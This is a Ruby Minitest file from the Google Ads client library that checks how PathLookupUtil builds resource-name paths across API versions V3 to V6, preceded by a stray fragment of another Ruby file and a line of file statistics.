require_each(INPUTS_FILES, path: 'formtastic/inputs')
end
end
end
end
end
| 23.387097 | 65 | 0.696552 |
4a6aeda361b6490aa464117dfccdad17e70cf3f8 | 48,355 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Tests the PathLookupUtil class.
require 'minitest/autorun'
require 'google/ads/google_ads'
require 'google/ads/google_ads/utils/v3/path_lookup_util'
require 'google/ads/google_ads/utils/v4/path_lookup_util'
require 'google/ads/google_ads/utils/v5/path_lookup_util'
require 'google/ads/google_ads/utils/v6/path_lookup_util'
class TestPathLookupUtil < Minitest::Test
# Verifies resource-name path construction for every V3 PathLookupUtil
# helper. Each row pairs the expected resource name with the util method
# and arguments that must produce it; rows run in the original order.
def test_path_generation_v3()
  util = Google::Ads::GoogleAds::Utils::V3::PathLookupUtil.new
  # [expected resource name, util method, *method arguments]
  cases = [
    ['customers/1234/accountBudgetProposals/5678', :account_budget_proposal, 1234, 5678],
    ['customers/1234/accountBudgets/5678', :account_budget, 1234, 5678],
    ['customers/1234/adGroupAdLabels/56~78~90', :ad_group_ad_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupAds/567~890', :ad_group_ad, 1234, 567, 890],
    ['customers/1234/adGroupAudienceViews/567~890', :ad_group_audience_view, 1234, 567, 890],
    ['customers/1234/adGroupBidModifiers/567~890', :ad_group_bid_modifier, 1234, 567, 890],
    ['customers/1234/adGroupCriterionLabels/56~78~90', :ad_group_criterion_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupCriteria/567~890', :ad_group_criterion, 1234, 567, 890],
    ['customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0', :ad_group_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/adGroupExtensionSettings/567~890', :ad_group_extension_setting, 1234, 567, 890],
    ['customers/1234/adGroupFeeds/567~890', :ad_group_feed, 1234, 567, 890],
    ['customers/1234/adGroupLabels/567~890', :ad_group_label, 1234, 567, 890],
    ['customers/1234/adGroups/5678', :ad_group, 1234, 5678],
    ['customers/1234/adGroupSimulations/5~6~7~8~9', :ad_group_simulation, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/adParameters/56~78~90', :ad_parameter, 1234, 56, 78, 90],
    ['customers/1234/adScheduleViews/567~890', :ad_schedule_view, 1234, 567, 890],
    ['customers/1234/ageRangeViews/567~890', :age_range_view, 1234, 567, 890],
    ['customers/1234/assets/5678', :asset, 1234, 5678],
    ['customers/1234/biddingStrategies/5678', :bidding_strategy, 1234, 5678],
    ['customers/1234/billingSetups/5678', :billing_setup, 1234, 5678],
    ['customers/1234/campaignAudienceViews/567~890', :campaign_audience_view, 1234, 567, 890],
    ['customers/1234/campaignDrafts/567~890', :campaign_draft, 1234, 567, 890],
    ['customers/1234/campaignBidModifiers/567~890', :campaign_bid_modifier, 1234, 567, 890],
    ['customers/1234/campaignExperiments/5678', :campaign_experiment, 1234, 5678],
    ['customers/1234/campaignBudgets/5678', :campaign_budget, 1234, 5678],
    ['customers/1234/campaignCriteria/567~890', :campaign_criterion, 1234, 567, 890],
    ['customers/1234/campaignCriterionSimulations/5~6~7~8~9~0', :campaign_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/campaignExtensionSettings/567~890', :campaign_extension_setting, 1234, 567, 890],
    ['customers/1234/campaignFeeds/567~890', :campaign_feed, 1234, 567, 890],
    ['customers/1234/campaignLabels/567~890', :campaign_label, 1234, 567, 890],
    ['customers/1234/campaignSharedSets/567~890', :campaign_shared_set, 1234, 567, 890],
    ['customers/1234/campaigns/5678', :campaign, 1234, 5678],
    ['carrierConstants/123456', :carrier_constant, 123456],
    ['customers/1234/changeStatus/5678', :change_status, 1234, 5678],
    ['customers/1234/clickViews/567~890', :click_view, 1234, 567, 890],
    ['customers/1234/conversionActions/5678', :conversion_action, 1234, 5678],
    ['currencyConstants/123456', :currency_constant, 123456],
    ['customers/1234/customInterests/5678', :custom_interest, 1234, 5678],
    ['customers/1234/customerClientLinks/567~890', :customer_client_link, 1234, 567, 890],
    ['customers/1234/customerClients/5678', :customer_client, 1234, 5678],
    ['customers/1234/customerExtensionSettings/5678', :customer_extension_setting, 1234, 5678],
    ['customers/1234/customerFeeds/5678', :customer_feed, 1234, 5678],
    ['customers/1234/customerLabels/5678', :customer_label, 1234, 5678],
    ['customers/1234/customerManagerLinks/567~890', :customer_manager_link, 1234, 567, 890],
    ['customers/1234/customerNegativeCriteria/5678', :customer_negative_criterion, 1234, 5678],
    ['customers/123456', :customer, 123456],
    ['customers/1234/detailPlacementViews/567~890', :detail_placement_view, 1234, 567, 890],
    ['customers/1234/displayKeywordViews/567~890', :display_keyword_view, 1234, 567, 890],
    ['customers/1234/domainCategories/56~78~90', :domain_category, 1234, 56, 78, 90],
    ['customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9', :dynamic_search_ads_search_term_view, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/expandedLandingPageViews/5678', :expanded_landing_page_view, 1234, 5678],
    ['customers/1234/extensionFeedItems/5678', :extension_feed_item, 1234, 5678],
    ['customers/1234/feedItems/567~890', :feed_item, 1234, 567, 890],
    ['customers/1234/feedItemTargets/5~6~7~8', :feed_item_target, 1234, 5, 6, 7, 8],
    ['customers/1234/feedMappings/567~890', :feed_mapping, 1234, 567, 890],
    ['customers/1234/feedPlaceholderViews/5678', :feed_placeholder_view, 1234, 5678],
    ['customers/1234/feeds/5678', :feed, 1234, 5678],
    ['geoTargetConstants/123456', :geo_target_constant, 123456],
    ['customers/1234/geographicViews/567~890', :geographic_view, 1234, 567, 890],
    ['googleAdsFields/test_field', :google_ads_field, 'test_field'],
    ['customers/1234/groupPlacementViews/567~890', :group_placement_view, 1234, 567, 890],
    ['customers/1234/hotelGroupViews/567~890', :hotel_group_view, 1234, 567, 890],
    ['customers/123456/hotelPerformanceView', :hotel_performance_view, 123456],
    ['customers/1234/keywordPlanAdGroups/5678', :keyword_plan_ad_group, 1234, 5678],
    ['customers/1234/keywordPlanCampaigns/5678', :keyword_plan_campaign, 1234, 5678],
    ['customers/1234/keywordPlanKeywords/5678', :keyword_plan_keyword, 1234, 5678],
    ['customers/1234/keywordPlanNegativeKeywords/5678', :keyword_plan_negative_keyword, 1234, 5678],
    ['customers/1234/keywordPlans/5678', :keyword_plan, 1234, 5678],
    ['customers/1234/keywordViews/567~890', :keyword_view, 1234, 567, 890],
    ['customers/1234/labels/5678', :label, 1234, 5678],
    ['languageConstants/123456', :language_constant, 123456],
    ['customers/1234/locationViews/567~890', :location_view, 1234, 567, 890],
    ['customers/1234/managedPlacementViews/567~890', :managed_placement_view, 1234, 567, 890],
    ['customers/1234/mediaFiles/5678', :media_file, 1234, 5678],
    ['customers/1234/merchantCenterLinks/5678', :merchant_center_link, 1234, 5678],
    ['mobileAppCategoryConstants/123456', :mobile_app_category_constant, 123456],
    ['mobileDeviceConstants/123456', :mobile_device_constant, 123456],
    ['customers/1234/mutateJobs/5678', :mutate_job, 1234, 5678],
    ['operatingSystemVersionConstants/123456', :operating_system_version_constant, 123456],
    ['customers/1234/parentalStatusViews/567~890', :parental_status_view, 1234, 567, 890],
    ['productBiddingCategoryConstants/123~456~789', :product_bidding_category_constant, 123, 456, 789],
    ['customers/1234/productGroupViews/567~890', :product_group_view, 1234, 567, 890],
    ['customers/1234/recommendations/5678', :recommendation, 1234, 5678],
    ['customers/1234/remarketingActions/5678', :remarketing_action, 1234, 5678],
    ['customers/1234/searchTermViews/56~78~90', :search_term_view, 1234, 56, 78, 90],
    ['customers/1234/sharedCriteria/567~890', :shared_criterion, 1234, 567, 890],
    ['customers/1234/sharedSets/5678', :shared_set, 1234, 5678],
    ['customers/1234/shoppingPerformanceView', :shopping_performance_view, 1234],
    ['topicConstants/123456', :topic_constant, 123456],
    ['customers/1234/topicViews/567~890', :topic_view, 1234, 567, 890],
    ['customers/1234/userInterests/5678', :user_interest, 1234, 5678],
    ['customers/1234/userLists/5678', :user_list, 1234, 5678],
    ['customers/1234/videos/5678', :video, 1234, 5678]
  ]
  cases.each do |expected, method_name, *args|
    assert_equal(expected, util.public_send(method_name, *args))
  end
end
# Verifies resource-name path construction for every V4 PathLookupUtil
# helper (adds account_link, batch_job, income_range_view, the keyword-plan
# keyword resources, and third_party_app_analytics_link relative to V3).
def test_path_generation_v4()
  util = Google::Ads::GoogleAds::Utils::V4::PathLookupUtil.new
  # [expected resource name, util method, *method arguments]
  cases = [
    ['customers/1234/accountBudgetProposals/5678', :account_budget_proposal, 1234, 5678],
    ['customers/1234/accountBudgets/5678', :account_budget, 1234, 5678],
    ['customers/1234/accountLinks/5678', :account_link, 1234, 5678],
    ['customers/1234/adGroupAdLabels/56~78~90', :ad_group_ad_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupAds/567~890', :ad_group_ad, 1234, 567, 890],
    ['customers/1234/adGroupAudienceViews/567~890', :ad_group_audience_view, 1234, 567, 890],
    ['customers/1234/adGroupBidModifiers/567~890', :ad_group_bid_modifier, 1234, 567, 890],
    ['customers/1234/adGroupCriterionLabels/56~78~90', :ad_group_criterion_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupCriteria/567~890', :ad_group_criterion, 1234, 567, 890],
    ['customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0', :ad_group_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/adGroupExtensionSettings/567~890', :ad_group_extension_setting, 1234, 567, 890],
    ['customers/1234/adGroupFeeds/567~890', :ad_group_feed, 1234, 567, 890],
    ['customers/1234/adGroupLabels/567~890', :ad_group_label, 1234, 567, 890],
    ['customers/1234/adGroups/5678', :ad_group, 1234, 5678],
    ['customers/1234/adGroupSimulations/5~6~7~8~9', :ad_group_simulation, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/adParameters/56~78~90', :ad_parameter, 1234, 56, 78, 90],
    ['customers/1234/adScheduleViews/567~890', :ad_schedule_view, 1234, 567, 890],
    ['customers/1234/ageRangeViews/567~890', :age_range_view, 1234, 567, 890],
    ['customers/1234/assets/5678', :asset, 1234, 5678],
    ['customers/1234/batchJobs/5678', :batch_job, 1234, 5678],
    ['customers/1234/biddingStrategies/5678', :bidding_strategy, 1234, 5678],
    ['customers/1234/billingSetups/5678', :billing_setup, 1234, 5678],
    ['customers/1234/campaignAudienceViews/567~890', :campaign_audience_view, 1234, 567, 890],
    ['customers/1234/campaignDrafts/567~890', :campaign_draft, 1234, 567, 890],
    ['customers/1234/campaignBidModifiers/567~890', :campaign_bid_modifier, 1234, 567, 890],
    ['customers/1234/campaignExperiments/5678', :campaign_experiment, 1234, 5678],
    ['customers/1234/campaignBudgets/5678', :campaign_budget, 1234, 5678],
    ['customers/1234/campaignCriteria/567~890', :campaign_criterion, 1234, 567, 890],
    ['customers/1234/campaignCriterionSimulations/5~6~7~8~9~0', :campaign_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/campaignExtensionSettings/567~890', :campaign_extension_setting, 1234, 567, 890],
    ['customers/1234/campaignFeeds/567~890', :campaign_feed, 1234, 567, 890],
    ['customers/1234/campaignLabels/567~890', :campaign_label, 1234, 567, 890],
    ['customers/1234/campaignSharedSets/567~890', :campaign_shared_set, 1234, 567, 890],
    ['customers/1234/campaigns/5678', :campaign, 1234, 5678],
    ['carrierConstants/123456', :carrier_constant, 123456],
    ['customers/1234/changeStatus/5678', :change_status, 1234, 5678],
    ['customers/1234/clickViews/567~890', :click_view, 1234, 567, 890],
    ['customers/1234/conversionActions/5678', :conversion_action, 1234, 5678],
    ['currencyConstants/123456', :currency_constant, 123456],
    ['customers/1234/customInterests/5678', :custom_interest, 1234, 5678],
    ['customers/1234/customerClientLinks/567~890', :customer_client_link, 1234, 567, 890],
    ['customers/1234/customerClients/5678', :customer_client, 1234, 5678],
    ['customers/1234/customerExtensionSettings/5678', :customer_extension_setting, 1234, 5678],
    ['customers/1234/customerFeeds/5678', :customer_feed, 1234, 5678],
    ['customers/1234/customerLabels/5678', :customer_label, 1234, 5678],
    ['customers/1234/customerManagerLinks/567~890', :customer_manager_link, 1234, 567, 890],
    ['customers/1234/customerNegativeCriteria/5678', :customer_negative_criterion, 1234, 5678],
    ['customers/123456', :customer, 123456],
    ['customers/1234/detailPlacementViews/567~890', :detail_placement_view, 1234, 567, 890],
    ['customers/1234/displayKeywordViews/567~890', :display_keyword_view, 1234, 567, 890],
    ['customers/1234/domainCategories/56~78~90', :domain_category, 1234, 56, 78, 90],
    ['customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9', :dynamic_search_ads_search_term_view, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/expandedLandingPageViews/5678', :expanded_landing_page_view, 1234, 5678],
    ['customers/1234/extensionFeedItems/5678', :extension_feed_item, 1234, 5678],
    ['customers/1234/feedItems/567~890', :feed_item, 1234, 567, 890],
    ['customers/1234/feedItemTargets/5~6~7~8', :feed_item_target, 1234, 5, 6, 7, 8],
    ['customers/1234/feedMappings/567~890', :feed_mapping, 1234, 567, 890],
    ['customers/1234/feedPlaceholderViews/5678', :feed_placeholder_view, 1234, 5678],
    ['customers/1234/feeds/5678', :feed, 1234, 5678],
    ['geoTargetConstants/123456', :geo_target_constant, 123456],
    ['customers/1234/geographicViews/567~890', :geographic_view, 1234, 567, 890],
    ['googleAdsFields/test_field', :google_ads_field, 'test_field'],
    ['customers/1234/groupPlacementViews/567~890', :group_placement_view, 1234, 567, 890],
    ['customers/1234/hotelGroupViews/567~890', :hotel_group_view, 1234, 567, 890],
    ['customers/123456/hotelPerformanceView', :hotel_performance_view, 123456],
    ['customers/1234/incomeRangeViews/567~890', :income_range_view, 1234, 567, 890],
    ['customers/1234/keywordPlanAdGroups/5678', :keyword_plan_ad_group, 1234, 5678],
    ['customers/1234/keywordPlanAdGroupKeywords/5678', :keyword_plan_ad_group_keyword, 1234, 5678],
    ['customers/1234/keywordPlanCampaigns/5678', :keyword_plan_campaign, 1234, 5678],
    ['customers/1234/keywordPlanCampaignKeywords/5678', :keyword_plan_campaign_keyword, 1234, 5678],
    ['customers/1234/keywordPlans/5678', :keyword_plan, 1234, 5678],
    ['customers/1234/keywordViews/567~890', :keyword_view, 1234, 567, 890],
    ['customers/1234/labels/5678', :label, 1234, 5678],
    ['languageConstants/123456', :language_constant, 123456],
    ['customers/1234/locationViews/567~890', :location_view, 1234, 567, 890],
    ['customers/1234/managedPlacementViews/567~890', :managed_placement_view, 1234, 567, 890],
    ['customers/1234/mediaFiles/5678', :media_file, 1234, 5678],
    ['customers/1234/merchantCenterLinks/5678', :merchant_center_link, 1234, 5678],
    ['mobileAppCategoryConstants/123456', :mobile_app_category_constant, 123456],
    ['mobileDeviceConstants/123456', :mobile_device_constant, 123456],
    ['operatingSystemVersionConstants/123456', :operating_system_version_constant, 123456],
    ['customers/1234/parentalStatusViews/567~890', :parental_status_view, 1234, 567, 890],
    ['productBiddingCategoryConstants/123~456~789', :product_bidding_category_constant, 123, 456, 789],
    ['customers/1234/productGroupViews/567~890', :product_group_view, 1234, 567, 890],
    ['customers/1234/recommendations/5678', :recommendation, 1234, 5678],
    ['customers/1234/remarketingActions/5678', :remarketing_action, 1234, 5678],
    ['customers/1234/searchTermViews/56~78~90', :search_term_view, 1234, 56, 78, 90],
    ['customers/1234/sharedCriteria/567~890', :shared_criterion, 1234, 567, 890],
    ['customers/1234/sharedSets/5678', :shared_set, 1234, 5678],
    ['customers/1234/shoppingPerformanceView', :shopping_performance_view, 1234],
    ['customers/1234/thirdPartyAppAnalyticsLinks/5678', :third_party_app_analytics_link, 1234, 5678],
    ['topicConstants/123456', :topic_constant, 123456],
    ['customers/1234/topicViews/567~890', :topic_view, 1234, 567, 890],
    ['customers/1234/userInterests/5678', :user_interest, 1234, 5678],
    ['customers/1234/userLists/5678', :user_list, 1234, 5678],
    ['customers/1234/videos/5678', :video, 1234, 5678]
  ]
  cases.each do |expected, method_name, *args|
    assert_equal(expected, util.public_send(method_name, *args))
  end
end
# Verifies resource-name path construction for every V5 PathLookupUtil
# helper; the V5 resource set matches V4 — only the util version differs.
def test_path_generation_v5()
  util = Google::Ads::GoogleAds::Utils::V5::PathLookupUtil.new
  # [expected resource name, util method, *method arguments]
  cases = [
    ['customers/1234/accountBudgetProposals/5678', :account_budget_proposal, 1234, 5678],
    ['customers/1234/accountBudgets/5678', :account_budget, 1234, 5678],
    ['customers/1234/accountLinks/5678', :account_link, 1234, 5678],
    ['customers/1234/adGroupAdLabels/56~78~90', :ad_group_ad_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupAds/567~890', :ad_group_ad, 1234, 567, 890],
    ['customers/1234/adGroupAudienceViews/567~890', :ad_group_audience_view, 1234, 567, 890],
    ['customers/1234/adGroupBidModifiers/567~890', :ad_group_bid_modifier, 1234, 567, 890],
    ['customers/1234/adGroupCriterionLabels/56~78~90', :ad_group_criterion_label, 1234, 56, 78, 90],
    ['customers/1234/adGroupCriteria/567~890', :ad_group_criterion, 1234, 567, 890],
    ['customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0', :ad_group_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/adGroupExtensionSettings/567~890', :ad_group_extension_setting, 1234, 567, 890],
    ['customers/1234/adGroupFeeds/567~890', :ad_group_feed, 1234, 567, 890],
    ['customers/1234/adGroupLabels/567~890', :ad_group_label, 1234, 567, 890],
    ['customers/1234/adGroups/5678', :ad_group, 1234, 5678],
    ['customers/1234/adGroupSimulations/5~6~7~8~9', :ad_group_simulation, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/adParameters/56~78~90', :ad_parameter, 1234, 56, 78, 90],
    ['customers/1234/adScheduleViews/567~890', :ad_schedule_view, 1234, 567, 890],
    ['customers/1234/ageRangeViews/567~890', :age_range_view, 1234, 567, 890],
    ['customers/1234/assets/5678', :asset, 1234, 5678],
    ['customers/1234/batchJobs/5678', :batch_job, 1234, 5678],
    ['customers/1234/biddingStrategies/5678', :bidding_strategy, 1234, 5678],
    ['customers/1234/billingSetups/5678', :billing_setup, 1234, 5678],
    ['customers/1234/campaignAudienceViews/567~890', :campaign_audience_view, 1234, 567, 890],
    ['customers/1234/campaignDrafts/567~890', :campaign_draft, 1234, 567, 890],
    ['customers/1234/campaignBidModifiers/567~890', :campaign_bid_modifier, 1234, 567, 890],
    ['customers/1234/campaignExperiments/5678', :campaign_experiment, 1234, 5678],
    ['customers/1234/campaignBudgets/5678', :campaign_budget, 1234, 5678],
    ['customers/1234/campaignCriteria/567~890', :campaign_criterion, 1234, 567, 890],
    ['customers/1234/campaignCriterionSimulations/5~6~7~8~9~0', :campaign_criterion_simulation, 1234, 5, 6, 7, 8, 9, 0],
    ['customers/1234/campaignExtensionSettings/567~890', :campaign_extension_setting, 1234, 567, 890],
    ['customers/1234/campaignFeeds/567~890', :campaign_feed, 1234, 567, 890],
    ['customers/1234/campaignLabels/567~890', :campaign_label, 1234, 567, 890],
    ['customers/1234/campaignSharedSets/567~890', :campaign_shared_set, 1234, 567, 890],
    ['customers/1234/campaigns/5678', :campaign, 1234, 5678],
    ['carrierConstants/123456', :carrier_constant, 123456],
    ['customers/1234/changeStatus/5678', :change_status, 1234, 5678],
    ['customers/1234/clickViews/567~890', :click_view, 1234, 567, 890],
    ['customers/1234/conversionActions/5678', :conversion_action, 1234, 5678],
    ['currencyConstants/123456', :currency_constant, 123456],
    ['customers/1234/customInterests/5678', :custom_interest, 1234, 5678],
    ['customers/1234/customerClientLinks/567~890', :customer_client_link, 1234, 567, 890],
    ['customers/1234/customerClients/5678', :customer_client, 1234, 5678],
    ['customers/1234/customerExtensionSettings/5678', :customer_extension_setting, 1234, 5678],
    ['customers/1234/customerFeeds/5678', :customer_feed, 1234, 5678],
    ['customers/1234/customerLabels/5678', :customer_label, 1234, 5678],
    ['customers/1234/customerManagerLinks/567~890', :customer_manager_link, 1234, 567, 890],
    ['customers/1234/customerNegativeCriteria/5678', :customer_negative_criterion, 1234, 5678],
    ['customers/123456', :customer, 123456],
    ['customers/1234/detailPlacementViews/567~890', :detail_placement_view, 1234, 567, 890],
    ['customers/1234/displayKeywordViews/567~890', :display_keyword_view, 1234, 567, 890],
    ['customers/1234/domainCategories/56~78~90', :domain_category, 1234, 56, 78, 90],
    ['customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9', :dynamic_search_ads_search_term_view, 1234, 5, 6, 7, 8, 9],
    ['customers/1234/expandedLandingPageViews/5678', :expanded_landing_page_view, 1234, 5678],
    ['customers/1234/extensionFeedItems/5678', :extension_feed_item, 1234, 5678],
    ['customers/1234/feedItems/567~890', :feed_item, 1234, 567, 890],
    ['customers/1234/feedItemTargets/5~6~7~8', :feed_item_target, 1234, 5, 6, 7, 8],
    ['customers/1234/feedMappings/567~890', :feed_mapping, 1234, 567, 890],
    ['customers/1234/feedPlaceholderViews/5678', :feed_placeholder_view, 1234, 5678],
    ['customers/1234/feeds/5678', :feed, 1234, 5678],
    ['geoTargetConstants/123456', :geo_target_constant, 123456],
    ['customers/1234/geographicViews/567~890', :geographic_view, 1234, 567, 890],
    ['googleAdsFields/test_field', :google_ads_field, 'test_field'],
    ['customers/1234/groupPlacementViews/567~890', :group_placement_view, 1234, 567, 890],
    ['customers/1234/hotelGroupViews/567~890', :hotel_group_view, 1234, 567, 890],
    ['customers/123456/hotelPerformanceView', :hotel_performance_view, 123456],
    ['customers/1234/incomeRangeViews/567~890', :income_range_view, 1234, 567, 890],
    ['customers/1234/keywordPlanAdGroups/5678', :keyword_plan_ad_group, 1234, 5678],
    ['customers/1234/keywordPlanAdGroupKeywords/5678', :keyword_plan_ad_group_keyword, 1234, 5678],
    ['customers/1234/keywordPlanCampaigns/5678', :keyword_plan_campaign, 1234, 5678],
    ['customers/1234/keywordPlanCampaignKeywords/5678', :keyword_plan_campaign_keyword, 1234, 5678],
    ['customers/1234/keywordPlans/5678', :keyword_plan, 1234, 5678],
    ['customers/1234/keywordViews/567~890', :keyword_view, 1234, 567, 890],
    ['customers/1234/labels/5678', :label, 1234, 5678],
    ['languageConstants/123456', :language_constant, 123456],
    ['customers/1234/locationViews/567~890', :location_view, 1234, 567, 890],
    ['customers/1234/managedPlacementViews/567~890', :managed_placement_view, 1234, 567, 890],
    ['customers/1234/mediaFiles/5678', :media_file, 1234, 5678],
    ['customers/1234/merchantCenterLinks/5678', :merchant_center_link, 1234, 5678],
    ['mobileAppCategoryConstants/123456', :mobile_app_category_constant, 123456],
    ['mobileDeviceConstants/123456', :mobile_device_constant, 123456],
    ['operatingSystemVersionConstants/123456', :operating_system_version_constant, 123456],
    ['customers/1234/parentalStatusViews/567~890', :parental_status_view, 1234, 567, 890],
    ['productBiddingCategoryConstants/123~456~789', :product_bidding_category_constant, 123, 456, 789],
    ['customers/1234/productGroupViews/567~890', :product_group_view, 1234, 567, 890],
    ['customers/1234/recommendations/5678', :recommendation, 1234, 5678],
    ['customers/1234/remarketingActions/5678', :remarketing_action, 1234, 5678],
    ['customers/1234/searchTermViews/56~78~90', :search_term_view, 1234, 56, 78, 90],
    ['customers/1234/sharedCriteria/567~890', :shared_criterion, 1234, 567, 890],
    ['customers/1234/sharedSets/5678', :shared_set, 1234, 5678],
    ['customers/1234/shoppingPerformanceView', :shopping_performance_view, 1234],
    ['customers/1234/thirdPartyAppAnalyticsLinks/5678', :third_party_app_analytics_link, 1234, 5678],
    ['topicConstants/123456', :topic_constant, 123456],
    ['customers/1234/topicViews/567~890', :topic_view, 1234, 567, 890],
    ['customers/1234/userInterests/5678', :user_interest, 1234, 5678],
    ['customers/1234/userLists/5678', :user_list, 1234, 5678],
    ['customers/1234/videos/5678', :video, 1234, 5678]
  ]
  cases.each do |expected, method_name, *args|
    assert_equal(expected, util.public_send(method_name, *args))
  end
end
# Exercises every V6 resource-name helper on PathLookupUtil, asserting the
# exact REST path format for each resource type (composite IDs join with '~').
def test_path_generation_v6
  util = Google::Ads::GoogleAds::Utils::V6::PathLookupUtil.new
  assert_equal('customers/1234/accountBudgetProposals/5678', util.account_budget_proposal(1234, 5678))
  assert_equal('customers/1234/accountBudgets/5678', util.account_budget(1234, 5678))
  assert_equal('customers/1234/accountLinks/5678', util.account_link(1234, 5678))
  assert_equal('customers/1234/adGroupAdLabels/56~78~90', util.ad_group_ad_label(1234, 56, 78, 90))
  assert_equal('customers/1234/adGroupAds/567~890', util.ad_group_ad(1234, 567, 890))
  assert_equal('customers/1234/adGroupAudienceViews/567~890', util.ad_group_audience_view(1234, 567, 890))
  assert_equal('customers/1234/adGroupBidModifiers/567~890', util.ad_group_bid_modifier(1234, 567, 890))
  assert_equal('customers/1234/adGroupCriterionLabels/56~78~90', util.ad_group_criterion_label(1234, 56, 78, 90))
  assert_equal('customers/1234/adGroupCriteria/567~890', util.ad_group_criterion(1234, 567, 890))
  assert_equal('customers/1234/adGroupCriterionSimulations/5~6~7~8~9~0', util.ad_group_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
  assert_equal('customers/1234/adGroupExtensionSettings/567~890', util.ad_group_extension_setting(1234, 567, 890))
  assert_equal('customers/1234/adGroupFeeds/567~890', util.ad_group_feed(1234, 567, 890))
  assert_equal('customers/1234/adGroupLabels/567~890', util.ad_group_label(1234, 567, 890))
  assert_equal('customers/1234/adGroups/5678', util.ad_group(1234, 5678))
  assert_equal('customers/1234/adGroupSimulations/5~6~7~8~9', util.ad_group_simulation(1234, 5, 6, 7, 8, 9))
  assert_equal('customers/1234/adParameters/56~78~90', util.ad_parameter(1234, 56, 78, 90))
  assert_equal('customers/1234/adScheduleViews/567~890', util.ad_schedule_view(1234, 567, 890))
  assert_equal('customers/1234/ageRangeViews/567~890', util.age_range_view(1234, 567, 890))
  assert_equal('customers/1234/assets/5678', util.asset(1234, 5678))
  assert_equal('customers/1234/batchJobs/5678', util.batch_job(1234, 5678))
  assert_equal('customers/1234/biddingStrategies/5678', util.bidding_strategy(1234, 5678))
  assert_equal('customers/1234/billingSetups/5678', util.billing_setup(1234, 5678))
  assert_equal('customers/1234/campaignAudienceViews/567~890', util.campaign_audience_view(1234, 567, 890))
  assert_equal('customers/1234/campaignDrafts/567~890', util.campaign_draft(1234, 567, 890))
  assert_equal('customers/1234/campaignBidModifiers/567~890', util.campaign_bid_modifier(1234, 567, 890))
  assert_equal('customers/1234/campaignExperiments/5678', util.campaign_experiment(1234, 5678))
  assert_equal('customers/1234/campaignBudgets/5678', util.campaign_budget(1234, 5678))
  assert_equal('customers/1234/campaignCriteria/567~890', util.campaign_criterion(1234, 567, 890))
  assert_equal('customers/1234/campaignCriterionSimulations/5~6~7~8~9~0', util.campaign_criterion_simulation(1234, 5, 6, 7, 8, 9, 0))
  assert_equal('customers/1234/campaignExtensionSettings/567~890', util.campaign_extension_setting(1234, 567, 890))
  assert_equal('customers/1234/campaignFeeds/567~890', util.campaign_feed(1234, 567, 890))
  assert_equal('customers/1234/campaignLabels/567~890', util.campaign_label(1234, 567, 890))
  assert_equal('customers/1234/campaignSharedSets/567~890', util.campaign_shared_set(1234, 567, 890))
  assert_equal('customers/1234/campaigns/5678', util.campaign(1234, 5678))
  assert_equal('carrierConstants/123456', util.carrier_constant(123456))
  assert_equal('customers/1234/changeStatus/5678', util.change_status(1234, 5678))
  assert_equal('customers/1234/clickViews/567~890', util.click_view(1234, 567, 890))
  assert_equal('customers/1234/combinedAudiences/5678', util.combined_audience(1234, 5678))
  assert_equal('customers/1234/conversionActions/5678', util.conversion_action(1234, 5678))
  assert_equal('currencyConstants/123456', util.currency_constant(123456))
  assert_equal('customers/1234/customAudiences/5678', util.custom_audience(1234, 5678))
  assert_equal('customers/1234/customInterests/5678', util.custom_interest(1234, 5678))
  assert_equal('customers/1234/customerClientLinks/567~890', util.customer_client_link(1234, 567, 890))
  assert_equal('customers/1234/customerClients/5678', util.customer_client(1234, 5678))
  assert_equal('customers/1234/customerExtensionSettings/5678', util.customer_extension_setting(1234, 5678))
  assert_equal('customers/1234/customerFeeds/5678', util.customer_feed(1234, 5678))
  assert_equal('customers/1234/customerLabels/5678', util.customer_label(1234, 5678))
  assert_equal('customers/1234/customerManagerLinks/567~890', util.customer_manager_link(1234, 567, 890))
  assert_equal('customers/1234/customerNegativeCriteria/5678', util.customer_negative_criterion(1234, 5678))
  assert_equal('customers/1234/customerUserAccesses/5678', util.customer_user_access(1234, 5678))
  assert_equal('customers/123456', util.customer(123456))
  assert_equal('customers/1234/detailPlacementViews/567~890', util.detail_placement_view(1234, 567, 890))
  assert_equal('customers/1234/displayKeywordViews/567~890', util.display_keyword_view(1234, 567, 890))
  assert_equal('customers/1234/domainCategories/56~78~90', util.domain_category(1234, 56, 78, 90))
  assert_equal('customers/1234/dynamicSearchAdsSearchTermViews/5~6~7~8~9', util.dynamic_search_ads_search_term_view(1234, 5, 6, 7, 8, 9))
  assert_equal('customers/1234/expandedLandingPageViews/5678', util.expanded_landing_page_view(1234, 5678))
  assert_equal('customers/1234/extensionFeedItems/5678', util.extension_feed_item(1234, 5678))
  assert_equal('customers/1234/feedItems/567~890', util.feed_item(1234, 567, 890))
  assert_equal('customers/1234/feedItemSetLinks/56~78~90', util.feed_item_set_link(1234, 56, 78, 90))
  assert_equal('customers/1234/feedItemSets/567~890', util.feed_item_set(1234, 567, 890))
